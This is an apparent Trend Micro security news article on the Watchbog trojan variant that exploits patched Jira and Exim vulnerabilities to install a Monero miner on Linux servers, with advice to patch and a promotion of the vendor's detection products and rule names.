Watchbog Exploits Jira and Exim Vulnerabilities to Infect Linux Servers With Cryptocurrency Miner

Threat actors are targeting Linux servers with vulnerable software, namely the software development and project management tool Jira and the message transfer agent Exim, using a variant of the Watchbog trojan (detected by Trend Micro as Backdoor.Linux.EMEXIE.A and Backdoor.Linux.EMEXIE.B), which drops a Monero miner to expand their botnet operations.  

Bleeping Computer, which has been tracking Watchbog’s recent activities, noted that the malware was infecting Linux servers earlier in the year by exploiting vulnerabilities in other software such as Jenkins and Nexus Repository Manager 3.

[READ: Why administrators should modify the default settings in Jenkins]

New variant spotted

A more recent variant, which was found by security researcher polarpy, abuses two vulnerabilities. The first is CVE-2019-11581, a server-side template vulnerability in Jira Server and Data Center that could result in an attacker executing code remotely (and which has since been patched). The second vulnerability it exploits is another remote code flaw, this time involving Exim: CVE-2019-10149 (like CVE-2019-11581, this particular vulnerability has also been addressed).

If Watchbog is successful with its infection routine, it will download and execute commands from a Pastebin C&C server to deploy a Monero cryptocurrency miner on the infected machine. It will then add itself to multiple crontab files for persistence.

Alleged good intentions

One interesting detail about this Watchbog variant is that its coin miner script includes a note that mentions the attackers’ alleged good intentions: keeping the internet safe by exposing compromised machines that have exploitable vulnerabilities. The note also mentions that the perpetrators’ only goal is to mine — with no intention of abusing the stored data within infected servers.

Highlighting the importance of patching

While the threat actors’ note doesn’t excuse the act of performing cryptocurrency mining without the owner’s approval, it does highlight an important point: Patching should always be a priority for organizations, especially when the systems and software they use are dealing with critical vulnerabilities. In this case, both of the vulnerabilities exploited by Watchbog are already patched — leaving IT administrators with little excuse not to update their machines.

Given the popularity of software like Jira in DevOps environments, organizations can strengthen their overall security by using technology such as Trend Micro DevOps security solutions that bake security into the development process, allowing them to make development cycles more efficient and reduce human touch points and errors.  

Another security technology enterprises can consider is the Trend Micro™ Deep Discovery™ solution, which  provides detection, in-depth analysis, and proactive response to attacks that use exploits through specialized engines, custom sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect these attacks even without any engine or pattern update. 

It also includes the Trend Micro Deep Discovery Inspector, which protects customers from the specific Watchbog attack in this article via these DDI rules:


  • DDI Rule 2945: CVE-2019-10149 Exim Remote Code Execution Exploit - SMTP (Request)
  • DDI Rule 4101: CVE-2019-10149 Exim Remote Code Execution Exploit - SMTP (Request) - Variant 2


  • DDI Rule 4162: CVE-2019-11581 Atlassian JIRA Template Injection  - HTTP (Request)

Like it? Add this infographic to your site:
1. Click on the box below.   2. Press Ctrl+A to select all.   3. Press Ctrl+C to copy.   4. Paste the code into your page (Ctrl+V).

Image will appear the same size as you see above.